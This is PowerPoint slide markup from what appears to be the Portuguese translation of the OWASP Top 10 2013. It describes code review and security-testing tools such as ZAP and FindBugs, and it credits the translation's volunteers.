                        <a:rPr lang="pt-BR" sz="1000" baseline="0" noProof="0" dirty="0" smtClean="0"/>
                        <a:t>A revisão do código fonte é particularmente útil para verificar se os mecanismos de segurança da aplicação são robustos, assim como para encontrar problemas difíceis de identificar simplesmente examinando os resultados da aplicação. Testar a aplicação é particularmente útil para provar que as falhas são de fato exploráveis. Esses métodos são complementares e até redundantes em algumas áreas. </a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="pt-BR" sz="1000" baseline="0" noProof="0" dirty="0" smtClean="0"/>
                        <a:t>Revisando o Código: Para acompanhar o </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="pt-BR" sz="1000" kern="1200" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:hlinkClick r:id="rId6"/>
                        </a:rPr>
                        <a:t>Guia do Desenvolvedor OWASP</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="pt-BR" sz="1000" baseline="0" noProof="0" dirty="0" smtClean="0"/>
                        <a:t> e o </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="pt-BR" sz="1000" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:hlinkClick r:id="rId7"/>
                        </a:rPr>
                        <a:t>Guia de Teste OWASP</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="pt-BR" sz="1000" baseline="0" noProof="0" dirty="0" smtClean="0"/>
                        <a:t>, o OWASP criou o </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="pt-BR" sz="1000" u="none" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:hlinkClick r:id="rId8"/>
                        </a:rPr>
                        <a:t>Guia de Revisão de Código OWASP</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="pt-BR" sz="1000" u="none" baseline="0" noProof="0" dirty="0" smtClean="0"/>
                        <a:t> para ajudar os desenvolvedores e os especialistas em segurança de aplicações a entender como revisar uma aplicação web eficientemente e de maneira eficaz. Inúmeros problemas de segurança em aplicações web, tais como Falhas de </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="pt-BR" sz="1000" baseline="0" noProof="0" dirty="0" smtClean="0"/>
                        <a:t>Injeção, podem ser mais fáceis de detectar através da revisão do código do que por testes externos.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="pt-BR" sz="1000" baseline="0" noProof="0" dirty="0" smtClean="0"/>
                        <a:t>Ferramentas para Revisão de Código: OWASP tem feito um trabalho promissor de ajuda aos especialistas na análise de código, mas essas ferramentas estão ainda em fase inicial. Os autores das ferramentas usam as mesmas diariamente, mas não-especialistas podem achá-las difíceis de usar. Entre estas ferramentas estão </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="pt-BR" sz="1000" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:hlinkClick r:id="rId9"/>
                        </a:rPr>
                        <a:t>CodeCrawler</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="pt-BR" sz="1000" baseline="0" noProof="0" dirty="0" smtClean="0"/>
                        <a:t>, </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="pt-BR" sz="1000" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:hlinkClick r:id="rId10"/>
                        </a:rPr>
                        <a:t>Orizon</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="pt-BR" sz="1000" baseline="0" noProof="0" dirty="0" smtClean="0"/>
                        <a:t> e </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="pt-BR" sz="1000" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:hlinkClick r:id="rId11"/>
                        </a:rPr>
                        <a:t>O2</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="pt-BR" sz="1000" baseline="0" noProof="0" dirty="0" smtClean="0"/>
                        <a:t>. Somente a </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="pt-BR" sz="1000" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:hlinkClick r:id="rId11"/>
                        </a:rPr>
                        <a:t>O2</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="pt-BR" sz="1000" baseline="0" noProof="0" dirty="0" smtClean="0"/>
                        <a:t> está em desenvolvimento ativo desde a última versão dos Top 10 de 2010. </a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="pt-BR" sz="1000" baseline="0" noProof="0" dirty="0" smtClean="0"/>
                        <a:t>Existem outras ferramentas abertas para revisão de código. A mais promissora delas é a </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="pt-BR" sz="1000" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:hlinkClick r:id="rId12"/>
                        </a:rPr>
                        <a:t>FindBugs</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="pt-BR" sz="1000" baseline="0" noProof="0" dirty="0" smtClean="0"/>
                        <a:t>, e seu novo plug-in voltado a segurança: </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="pt-BR" sz="1000" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:hlinkClick r:id="rId13"/>
                        </a:rPr>
                        <a:t>FindSecurityBugs</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="pt-BR" sz="1000" baseline="0" noProof="0" dirty="0" smtClean="0"/>
                        <a:t>, ambos para Java.</a:t>
                      </a:r>
                      <a:endParaRPr lang="pt-BR" sz="1000" b="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:schemeClr val="tx2"/>
                        </a:solidFill>
                      </a:endParaRPr>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852282188"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="3581400" y="4343400"/>
          <a:ext cx="3276600" cy="4800600"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr bandRow="1">
                <a:tableStyleId>{D27102A9-8310-4765-A935-A1911B00CA55}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="3276600"/>
              </a:tblGrid>
              <a:tr h="363898">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="pt-BR" sz="1600" b="1" noProof="0" dirty="0" smtClean="0"/>
                        <a:t>Segurança e Teste de Invasão</a:t>
                      </a:r>
                      <a:endParaRPr lang="pt-BR" sz="1100" b="1" noProof="0" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="F9FBFD"/>
                        </a:solidFill>
                        <a:latin typeface="+mj-lt"/>
                      </a:endParaRPr>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rgbClr val="D9EAD5"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="4436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000" baseline="0" noProof="0" dirty="0" smtClean="0"/>
                        <a:t>Testando a Aplicação: OWASP criou o </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="pt-BR" sz="1000" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:hlinkClick r:id="rId7"/>
                        </a:rPr>
                        <a:t>Guia de Testes</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="pt-BR" sz="1000" baseline="0" noProof="0" dirty="0" smtClean="0"/>
                        <a:t> para ajudar desenvolvedores, responsáveis por testes e especialistas em segurança de aplicações a testar a segurança de aplicações web eficientemente e de maneira eficaz. Esse guia enorme, elaborado por dezenas de contribuintes, apresenta uma cobertura extensa em muitos tópicos de testes de segurança para aplicações web. Da mesma forma que a revisão de código tem seus pontos fortes, os testes de segurança também tem suas vantagens. É bastante convincente quando se consegue provar que a aplicação é insegura mostrando a exploração da vulnerabilidade. Existem muitos outros problemas , particularmente a segurança da infraestrutura da aplicação, que não podem ser vistos simplesmente com uma revisão de código, já que a aplicação não provê segurança por si própria. </a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="pt-BR" sz="1000" baseline="0" noProof="0" dirty="0" smtClean="0"/>
                        <a:t>Ferramentas para Testes de Invasão: </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="pt-BR" sz="1000" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:hlinkClick r:id="rId14"/>
                        </a:rPr>
                        <a:t>WebScarab</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="pt-BR" sz="1000" baseline="0" noProof="0" dirty="0" smtClean="0"/>
                        <a:t>, que foi um dos projetos OWASP mais usados, e a nova </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="pt-BR" sz="1000" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:hlinkClick r:id="rId15"/>
                        </a:rPr>
                        <a:t>ZAP</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="pt-BR" sz="1000" baseline="0" noProof="0" dirty="0" smtClean="0"/>
                        <a:t>, que é agora ainda mais popular, são ambas proxies de testes de aplicações web. Essas ferramentas permitem que analistas de segurança e desenvolvedores interceptem pedidos às aplicações web, de modo a entender como a aplicação trabalha, e submeter pedidos de teste para verificar se a aplicação responde de maneira segura aos testes. Essas ferramentas são particularmente eficazes em ajudar a identificar falhas de XSS , Autenticação e Controle de Acesso. </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="pt-BR" sz="1000" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:hlinkClick r:id="rId15"/>
                        </a:rPr>
                        <a:t>ZAP</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="pt-BR" sz="1000" baseline="0" noProof="0" dirty="0" smtClean="0"/>
                        <a:t> tem até um </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="pt-BR" sz="1000" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:hlinkClick r:id="rId16"/>
                        </a:rPr>
                        <a:t>scanner ativo</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="pt-BR" sz="1000" baseline="0" noProof="0" dirty="0" smtClean="0"/>
                        <a:t> embutido e, melhor ainda, é GRÁTIS!</a:t>
                      </a:r>
                      <a:endParaRPr lang="pt-BR" sz="1000" baseline="0" noProof="0" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:schemeClr val="tx2"/>
                        </a:solidFill>
                      </a:endParaRPr>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bl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1796513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0" y="0"/>
            <a:ext cx="1295400" cy="830997"/>
          </a:xfrm>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0">
            <a:schemeClr val="accent4"/>
          </a:lnRef>
          <a:fillRef idx="3">
            <a:schemeClr val="accent4"/>
          </a:fillRef>
          <a:effectRef idx="3">
            <a:schemeClr val="accent4"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="lt1"/>
          </a:fontRef>
        </p:style>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>BR</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Versão PT-BR</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619807290"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="1144986"/>
          <a:ext cx="3352800" cy="8033763"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr bandRow="1">
                <a:tableStyleId>{D27102A9-8310-4765-A935-A1911B00CA55}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="3352800"/>
              </a:tblGrid>
              <a:tr h="455214">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1"/>
                      <a:r>
                        <a:rPr lang="pt-BR" sz="1600" b="1" kern="1200" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>Notas</a:t>
                      </a:r>
                      <a:endParaRPr lang="pt-BR" sz="1600" b="1" kern="1200" noProof="0" dirty="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rgbClr val="D9EAD5"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="75785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BR" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                    </a:p>
                    <a:p>
                      <a:pPr rtl="0"/>
                      <a:r>
                        <a:rPr lang="pt-PT" sz="1400" kern="1200" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>Esta versão do OWASP Top 10 foi desenvolvida como parte integrante da atividade conjunta dos capítulos brasileiro e português da OWASP, em prol da comunidade de programadores e da segurança das aplicações desenvolvidas nos países de língua portuguesa. </a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr rtl="0"/>
                      <a:endParaRPr lang="pt-PT" sz="1400" kern="1200" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="+mn-lt"/>
                        <a:ea typeface="+mn-ea"/>
                        <a:cs typeface="+mn-cs"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr rtl="0"/>
                      <a:r>
                        <a:rPr lang="pt-PT" sz="1400" kern="1200" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>Este documento é baseado na versão OWASP Top 10 de 2013 e a tradução pretende ser fiel ao texto original.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr rtl="0"/>
                      <a:endParaRPr lang="pt-PT" sz="1400" kern="1200" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="+mn-lt"/>
                        <a:ea typeface="+mn-ea"/>
                        <a:cs typeface="+mn-cs"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr rtl="0"/>
                      <a:r>
                        <a:rPr lang="pt-PT" sz="1400" kern="1200" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>O Projeto OWASP em Língua Portuguesa pode ser acessado em: </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="pt-PT" sz="1200" kern="1200" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                          <a:hlinkClick r:id="rId4"/>
                        </a:rPr>
                        <a:t>https://www.owasp.org/index.php/OWASP_Portuguese_Language_Project</a:t>
                      </a:r>
                      <a:endParaRPr lang="pt-PT" sz="1200" kern="1200" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="+mn-lt"/>
                        <a:ea typeface="+mn-ea"/>
                        <a:cs typeface="+mn-cs"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr rtl="0"/>
                      <a:endParaRPr lang="pt-PT" sz="1400" kern="1200" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="+mn-lt"/>
                        <a:ea typeface="+mn-ea"/>
                        <a:cs typeface="+mn-cs"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr rtl="0"/>
                      <a:r>
                        <a:rPr lang="pt-PT" sz="1400" kern="1200" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>Para saber mais sobre os eventos e atividades desenvolvidas pelos capítulos brasileiro e português da OWASP, acesse as páginas:</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="171450" indent="-171450" rtl="0">
                        <a:buFontTx/>
                        <a:buChar char="-"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="pt-PT" sz="1200" kern="1200" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                          <a:hlinkClick r:id="rId5"/>
                        </a:rPr>
                        <a:t>https://www.owasp.org/index.php/Brazilian</a:t>
                      </a:r>
                      <a:endParaRPr lang="pt-PT" sz="1200" kern="1200" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="+mn-lt"/>
                        <a:ea typeface="+mn-ea"/>
                        <a:cs typeface="+mn-cs"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="171450" indent="-171450" rtl="0">
                        <a:buFontTx/>
                        <a:buChar char="-"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="pt-PT" sz="1200" kern="1200" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                          <a:hlinkClick r:id="rId6"/>
                        </a:rPr>
                        <a:t>https://www.owasp.org/index.php/Portuguese</a:t>
                      </a:r>
                      <a:endParaRPr lang="pt-PT" sz="1200" kern="1200" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="+mn-lt"/>
                        <a:ea typeface="+mn-ea"/>
                        <a:cs typeface="+mn-cs"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="171450" indent="-171450" rtl="0">
                        <a:buFontTx/>
                        <a:buChar char="-"/>
                      </a:pPr>
                      <a:endParaRPr lang="pt-PT" sz="1200" kern="1200" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="+mn-lt"/>
                        <a:ea typeface="+mn-ea"/>
                        <a:cs typeface="+mn-cs"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" indent="0" rtl="0">
                        <a:buFontTx/>
                        <a:buNone/>
                      </a:pPr>
                      <a:endParaRPr lang="pt-PT" sz="14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pt-BR" sz="1400" baseline="0" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:schemeClr val="tx2"/>
                        </a:solidFill>
                      </a:endParaRPr>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948703957"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="3429000" y="1143000"/>
          <a:ext cx="3429000" cy="8013499"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr bandRow="1">
                <a:tableStyleId>{D27102A9-8310-4765-A935-A1911B00CA55}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="3429000"/>
              </a:tblGrid>
              <a:tr h="457200">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="pt-BR" sz="1600" b="1" kern="1200" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>Participantes</a:t>
                      </a:r>
                      <a:endParaRPr lang="pt-BR" sz="1600" b="1" noProof="0" dirty="0">
                        <a:latin typeface="+mj-lt"/>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rgbClr val="D9EAD5"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="75562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BR" sz="100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sz="1400" noProof="0" dirty="0" smtClean="0"/>
                        <a:t>Participaram</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="pt-BR" sz="1400" baseline="0" noProof="0" dirty="0" smtClean="0"/>
                        <a:t> da tradução os líderes do Projeto </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="pt-PT" sz="1400" kern="1200" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>OWASP em Língua Portuguesa: </a:t>
                      </a:r>
                      <a:endParaRPr lang="pt-BR" sz="1400" noProof="0" dirty="0" smtClean="0"/>
                    </a:p>
                    <a:p>
                      <a:pPr marL="227013" marR="0" indent="-114300" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFont typeface="Arial" charset="0"/>
                        <a:buChar char="•"/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="pt-BR" sz="1400" noProof="0" dirty="0" smtClean="0"/>
                        <a:t>Carlos Serrão (Portugal)</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="227013" marR="0" indent="-114300" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFont typeface="Arial" charset="0"/>
                        <a:buChar char="•"/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="pt-BR" sz="1400" noProof="0" dirty="0" smtClean="0"/>
                        <a:t>Marcio Machry (Brasil)</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="112713" marR="0" indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFont typeface="Arial" charset="0"/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:endParaRPr lang="pt-BR" sz="100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sz="1400" noProof="0" dirty="0" smtClean="0"/>
                        <a:t>E os seguintes voluntários:</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="227013" marR="0" indent="-114300" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFont typeface="Arial" charset="0"/>
                        <a:buChar char="•"/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="pt-BR" sz="1400" noProof="0" dirty="0" smtClean="0"/>
                        <a:t>Ícaro Evangelista</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="pt-BR" sz="1400" baseline="0" noProof="0" dirty="0" smtClean="0"/>
                        <a:t> de Torres</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="227013" marR="0" indent="-114300" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFont typeface="Arial" charset="0"/>
                        <a:buChar char="•"/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="pt-BR" sz="1400" dirty="0" smtClean="0"/>
                        <a:t>Carlo Marcelo Revoredo da Silva</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="227013" marR="0" indent="-114300" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFont typeface="Arial" charset="0"/>
